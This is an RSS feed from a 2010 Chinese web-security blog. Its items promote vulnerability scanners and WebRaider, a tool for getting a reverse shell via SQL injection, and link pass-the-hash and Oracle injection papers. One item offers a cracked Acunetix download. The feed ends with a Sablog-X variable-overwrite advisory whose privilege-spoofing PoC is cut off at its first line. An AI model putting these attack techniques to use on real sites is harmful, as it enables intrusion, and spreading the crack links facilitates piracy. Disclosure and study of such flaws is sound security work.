<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href='http://feed.pcsec.org/styles/temp01.xsl' type='text/xsl' ?><!--这是一个由Feedsy提供技术支持的Feed，为了提高读者阅读的体验，以及满足用户美化自己Feed的需要，我们设计了多种精美的Feed模板，提供给大家选择，所有最终呈现出来的样式，皆由用户自愿选择使用，未经许可，任何团体和个人，请不要擅自修改样式或者盗用，这是对于用户选择权的尊重。--><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><atom:link href="http://feed.pcsec.org" type="application/rss+xml" rel="self"></atom:link><fs:self_link href="http://feed.feedsky.com/pcsec" type="application/rss+xml"></fs:self_link><lastBuildDate>Sat, 06 Mar 2010 17:47:41 GMT</lastBuildDate><title>Web安全手册</title><description>关注Web安全</description><image><url>http://www.feedsky.com/feed/pcsec/sc/gif</url><title>Web安全手册</title><link>http://www.pcsec.org/</link></image><link>http://www.pcsec.org/</link><language>zh-CN</language><copyright>Copyright 2008-2009 Pcsec.org. Some Rights Reserved.苏ICP备08110306号var gaJsHost = ((&amp;quot;https:&amp;quot; == document.location.protocol) ? &amp;quot;https://ssl.&amp;quot; : &amp;quot;http://www.&amp;quot;);document.write(unescape(&amp;quot;%3Cscript src='&amp;quot; + gaJsHost + &amp;quot;google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E&amp;quot;));try {var pageTracker = _gat._getTracker(&amp;quot;UA-8775049-1&amp;quot;);pageTracker._trackPageview();} catch(err) {}</copyright><pubDate>Sat, 06 Mar 2010 17:50:50 GMT</pubDate><item><title>WebCruiser - Web Vulnerability Scanner V1.3.1.0306 Released</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/339430526/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=494</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=494&amp;key=4da1bebc</trackback:ping><description>&lt;p&gt;WebCruiser - Web Vulnerability Scanner V1.3.1.0306&lt;/p&gt;&lt;p&gt;Function:&lt;br /&gt;* Crawler(Site Directories And Files);&lt;br /&gt;* Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc.);&lt;br /&gt;* POC(Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection etc.;&lt;br /&gt;* GET/Post/Cookie Injection;&lt;br /&gt;* SQL Server: PlainText/FieldEcho(Union)/Blind Injection;&lt;br /&gt;* MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection;&lt;br /&gt;* Administration Entrance Search;&lt;br /&gt;* Password Hash of SQL Server/MySQL/Oracle Administrator;&lt;br /&gt;* Time Delay For Search Injection;&lt;br /&gt;* Auto Get Cookie From Web Browser For Authentication;&lt;br /&gt;* Multi-Thread;&lt;br /&gt;* Adcanced:Proxy,Escape Filter;&lt;br /&gt;* Report Output.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;System Requirement: Windows with .Net Framework 2.0 or above&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Go to &lt;a target=&quot;_blank&quot; href=&quot;http://sec4app.com/node/5&quot;&gt;Download &lt;/a&gt;page.&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=WebCruiser&quot;&gt;WebCruiser&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=web+vulnerability+scanner&quot;&gt;web vulnerability scanner&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/WebCruiser-Web-Vulnerability-Scanner-V1310306-Released.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Build-2010-02-10-Enterprise-Version.html&quot;&gt;Acunetix Web Vulnerability Scanner 6.5 Build 2010_02_10 Enterprise Version&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-2-27 10:9:28)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/WebCruiser-Web-Vulnerability-Scanner-V10.html&quot;&gt;WebCruiser - Web Vulnerability Scanner V1.0 中英文版&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-1-18 14:47:19)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Crack-Build-20090917.html&quot;&gt;Acunetix Web Vulnerability Scanner 6.5 Crack Build 20090917&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-11-23 20:38:46)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/web-vulnerability-scanner-20090317-Crack.html&quot;&gt;web vulnerability scanner 20090317 Crack&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-3-18 18:42:1)&lt;/p&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/339430526/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/339430526/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/339430526/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/339430526/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Sun, 07 Mar 2010 01:47:41 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/WebCruiser-Web-Vulnerability-Scanner-V1310306-Released.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/WebCruiser-Web-Vulnerability-Scanner-V1310306-Released.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/WebCruiser-Web-Vulnerability-Scanner-V1310306-Released.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/339430526/5281982</fs:itemid></item><item><title>webraider</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986692/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=493</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=493&amp;key=25fbfc2d</trackback:ping><description>&lt;p&gt;&lt;strong&gt;One Click Ownage&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using an extra channel such as TFTP, FTP to upload the initial payload.&lt;/p&gt;&lt;ul&gt;    &lt;li&gt;It's only one request therefore faster,&lt;/li&gt;    &lt;li&gt;Simple, you don't need a tool you can do it manually by using your browser or a simple MITM proxy,&lt;/li&gt;    &lt;li&gt;just copy paste the payload,&lt;/li&gt;    &lt;li&gt;CSRF(able), It's possible to craft a link and carry out a CSRF attack that will give you a reverse shell&lt;/li&gt;    &lt;li&gt;It's not fixed, you can change the payload,&lt;/li&gt;    &lt;li&gt;It's short, Generally not more than 3.500 characters,&lt;/li&gt;    &lt;li&gt;Doesn't require any application on the target system like FTP, TFTP or debug.exe&lt;/li&gt;    &lt;li&gt;Easy to automate.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;(source code and binaries are available)&lt;/p&gt;&lt;p&gt;&lt;img title=&quot;&quot; alt=&quot;&quot; onload=&quot;ResizeImage(this,520)&quot; src=&quot;http://www.pcsec.org/upload/2010/2/webraider-1.png&quot; /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.mavitunasecurity.com/blog/webraider/&quot;&gt;More Detail...&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=webraider&quot;&gt;webraider&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=sql+injection&quot;&gt;sql injection&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Injector&quot;&gt;Injector&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/webraider.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(2)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Dirty-Tricks.html&quot;&gt;Dirty Tricks&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-1-25 16:25:54)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/qingtiandy-Sql-Injection-Vulnerability-0day.html&quot;&gt;睛天电影系统注入漏洞&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-1-25 1:47:1)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Toolza-10-by-Pashkela.html&quot;&gt;Toolza 1.0 by Pashkela&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-1-19 13:6:42)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Invision-Power-Board-Local-PHP-File-Inclusion-and-SQL-Injection.html&quot;&gt;Invision Power Board &lt;= 3.0.4 Local PHP File Inclusion and SQL Injection&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-12-6 15:33:37)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/mysql-5-injector-by-mikawawa.html&quot;&gt;php+mysql5半自动注入工具&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-9-30 14:25:23)&lt;/p&gt;&lt;/ul&gt;&lt;hr /&gt; &lt;h3&gt;最新评论:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/webraider.html#cmt259&quot;&gt;2010-3-1 0:57:29&lt;/a&gt;，Trace ： 回Mickey牛:这还有个&lt;br/&gt;http://www.pcsec.org/archives/SA-Exploiter.html&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/webraider.html#cmt258&quot;&gt;2010-3-1 0:31:4&lt;/a&gt;，&lt;a href=&quot;http://pentest.cc&quot;&gt;mickey&lt;/a&gt; ： :-) &lt;br/&gt;&lt;br/&gt;sqlninja用debug&lt;br/&gt;http://sqlninja.sourceforge.net/&lt;br/&gt;&lt;br/&gt;也有用base64传文件的(vbscript)&lt;br/&gt;http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf&lt;br/&gt;&lt;br/&gt;还有这个用16进制的(vbscript)&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986692/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986692/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986692/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986692/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Sat, 27 Feb 2010 19:43:34 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/webraider.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/webraider.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/webraider.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986692/5281982</fs:itemid></item><item><title>Acunetix Web Vulnerability Scanner 6.5 Build 2010_02_10 Enterprise Version</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986693/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=492</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=492&amp;key=3e284659</trackback:ping><description>&lt;p&gt;&lt;strong&gt;Acunetix Web Vulnerability Scanner 6.5 Build 2010_02_10 Enterprise Version:&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/356407862/2010_02_10_01_webvulnscan65.exe&quot;&gt;Download Here&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span id=&quot;PresenceContainer&quot;&gt;&lt;code&gt;&lt;span style=&quot;color: rgb(0,0,0)&quot;&gt;&lt;span style=&quot;color: rgb(0,0,0)&quot;&gt;2010_02_10_01_webvulnscan65.exe&lt;br /&gt;&lt;br /&gt;size:&amp;nbsp;15445824&amp;nbsp;byte&lt;br /&gt;&lt;br /&gt;MD5:&amp;nbsp;4BB84128A895CD5959C1369E1BD8AE55&lt;br /&gt;&lt;br /&gt;SHA1:&amp;nbsp;040AFAC2EE406AB6FBCF8AFBA078C34074EED933&lt;br /&gt;&lt;br /&gt;CRC32:&amp;nbsp;0CAFEA4F&lt;/span&gt; &lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Crack Patch:&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/356414045/web.vulnerability.scanner.6.5.patch.rar&quot;&gt;Download Here&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Acunetix&quot;&gt;Acunetix&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Acunetix+Web+Vulnerability+Scanner&quot;&gt;Acunetix Web Vulnerability Scanner&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=web+vulnerability+scanner&quot;&gt;web vulnerability scanner&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Enterprise+Version&quot;&gt;Enterprise Version&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Build-2010-02-10-Enterprise-Version.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(1)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/WebCruiser-Web-Vulnerability-Scanner-V1310306-Released.html&quot;&gt;WebCruiser - Web Vulnerability Scanner V1.3.1.0306 Released&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-3-7 1:47:41)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Portable-Acunetix-Web-Vulnerability-Scanner-Enterprise-Edition-v65-build-20100210.html&quot;&gt;Portable Acunetix Web Vulnerability Scanner Enterprise Edition v6.5 build 20100210&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-2-18 12:56:15)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/WebCruiser-Web-Vulnerability-Scanner-V10.html&quot;&gt;WebCruiser - Web Vulnerability Scanner V1.0 中英文版&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-1-18 14:47:19)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Crack-Build-20090917.html&quot;&gt;Acunetix Web Vulnerability Scanner 6.5 Crack Build 20090917&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-11-23 20:38:46)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-v6120090504-CrackedAcunetix-Web-Vulnerability-Scanner-v6120090504-patch.html&quot;&gt;Acunetix Web Vulnerability Scanner v6.1.20090504 最新破解版&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-5-12 13:9:3)&lt;/p&gt;&lt;/ul&gt;&lt;hr /&gt; &lt;h3&gt;最新评论:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Build-2010-02-10-Enterprise-Version.html#cmt257&quot;&gt;2010-2-28 15:49:57&lt;/a&gt;，robert ： good job!&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986693/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986693/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986693/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986693/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Sat, 27 Feb 2010 10:09:28 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Build-2010-02-10-Enterprise-Version.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Build-2010-02-10-Enterprise-Version.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Build-2010-02-10-Enterprise-Version.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986693/5281982</fs:itemid></item><item><title>Pass-the-hash attacks: Tools and Mitigation</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986694/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=491</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=491&amp;key=bce5aac0</trackback:ping><description>&lt;p&gt;Although pass-the-hash attacks have been around for a little over thirteen years,the knowledge of its existence is still poor.This paper tries to fill a gap in the knowledge of this attack through the testing of the freely available tools that facilitate the attack.While other papers and resources focus primarily on running the tools and sometimes comparing them, this paper offers an in-depth, systematic comparison of the tools across the various Windows platforms,including AV detection rates. It also provides exte... &lt;br /&gt;&lt;br /&gt;Download &lt;a target=&quot;_blank&quot; href=&quot;http://www.sans.org/reading_room/whitepapers/testing/rss/passthehash_attacks_tools_and_mitigation_33283&quot;&gt;PDF&lt;/a&gt;&lt;/p&gt;&lt;div&gt;&lt;img alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/tracker/232798662055846003-7440094832300837059?l=security-sh3ll.blogspot.com&quot; width=&quot;1&quot; height=&quot;1&quot; /&gt;&lt;/div&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Papers.html&quot;&gt;Papers&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Pass+the+hash&quot;&gt;Pass the hash&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Mitigation&quot;&gt;Mitigation&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=hash+injection&quot;&gt;hash injection&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Pass-the-hash-attacks-Tools-and-Mitigation.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Why-Crack-When-You-Can-Pass-the-Hash.html&quot;&gt;Why Crack When You Can Pass the Hash&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-11-4 12:43:16)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Hash-injection-Attacks-in-a-Windows-Network.html&quot;&gt;Hash injection Attacks in a Windows Network&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2007-3-16 22:23:30)&lt;/p&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986694/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986694/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986694/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986694/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Papers</category><pubDate>Wed, 24 Feb 2010 11:01:56 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Pass-the-hash-attacks-Tools-and-Mitigation.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Pass-the-hash-attacks-Tools-and-Mitigation.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Pass-the-hash-attacks-Tools-and-Mitigation.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986694/5281982</fs:itemid></item><item><title>Hacking Oracle from the Web</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986695/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=490</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=490&amp;key=84b662ac</trackback:ping><description>&lt;p&gt;&lt;span style=&quot;font-weight: bold&quot;&gt;Exploiting SQL Injection from Web Applications&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database.&lt;br /&gt;&lt;br /&gt;Download &lt;a target=&quot;_blank&quot; href=&quot;http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf&quot;&gt;PDF&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Papers.html&quot;&gt;Papers&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Hacking+oracle&quot;&gt;Hacking oracle&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Hacking-Oracle-from-the-Web.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Hacking-Oracle-from-the-Web.html#comment&quot; target=&quot;_blank&quot;&gt;还没有相关文章，您来说两句？&lt;/a&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986695/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986695/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986695/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986695/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Papers</category><pubDate>Tue, 23 Feb 2010 10:20:15 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Hacking-Oracle-from-the-Web.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Hacking-Oracle-from-the-Web.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Hacking-Oracle-from-the-Web.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986695/5281982</fs:itemid></item><item><title>Sablog-X v2.x 任意变量覆盖漏洞</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986696/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=489</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=489&amp;key=f52e3846</trackback:ping><description>&lt;p&gt;Sablog-X v2.x 任意变量覆盖漏洞&lt;/p&gt;&lt;p&gt;author: 80vul-B&lt;br /&gt;team:http://www.80vul.com&lt;/p&gt;&lt;p&gt;一 描叙：&lt;/p&gt;&lt;p&gt;由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞，导致可以利用extract()来覆盖任意变量，最终导致xss、sql注射、代码执行等很多严重的安全漏洞。&lt;/p&gt;&lt;p&gt;&lt;br /&gt;二 分析&lt;/p&gt;&lt;p&gt;common.inc.php代码里：&lt;/p&gt;&lt;p&gt;....&lt;br /&gt;$onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals');&lt;br /&gt;if ($onoff != 1) {&lt;br /&gt;&amp;nbsp;@extract($_COOKIE, EXTR_SKIP);&lt;br /&gt;&amp;nbsp;@extract($_POST, EXTR_SKIP);&lt;br /&gt;&amp;nbsp;@extract($_GET, EXTR_SKIP);&lt;br /&gt;}&lt;br /&gt;...&lt;br /&gt;$sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']);&lt;br /&gt;list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode(&amp;quot;\t&amp;quot;, authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');&lt;br /&gt;$sax_hash = sax_addslashes($_COOKIE['sax_hash']);&lt;br /&gt;...&lt;br /&gt;$seccode = $sessionexists = 0;&lt;br /&gt;if ($sax_hash) {&lt;br /&gt;...&lt;br /&gt;&amp;nbsp;if ($_EVO = $DB-&amp;gt;fetch_array($query)){ //$_EVO初始化过程在if ($sax_hash)里，如果这个if条件不满足，将跳过这个初始化过程。&lt;br /&gt;...&lt;br /&gt;}&lt;br /&gt;if(!$sessionexists) {&lt;br /&gt;&amp;nbsp;if($sax_uid) {&lt;br /&gt;&amp;nbsp;&amp;nbsp;if(!($_EVO = $DB-&amp;gt;fetch_one_array(&amp;quot;SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'&amp;quot;))) {&lt;br /&gt;...&lt;br /&gt;@extract($_EVO); //覆盖任意变量&lt;/p&gt;&lt;p&gt;由上面的代码片断可以看到,只要使$sax_hash和$sax_uid的布尔值为fales,$_EVO就不会被赋值,而$sax_hash和$sax_uid这两个变量来自由$_COOKIE,这样我们可以很容易的控制$_EVO了,然后通过extract()来覆盖任意变量,这将导致xss、sql inj、代码执行等很多严重的安全漏洞:)&lt;/p&gt;&lt;p&gt;三 利用&lt;/p&gt;&lt;p&gt;下面给个后台权限欺骗的PoC:&lt;/p&gt;&lt;p&gt;POST http://127.0.0.1/sax/cp.php&amp;nbsp; 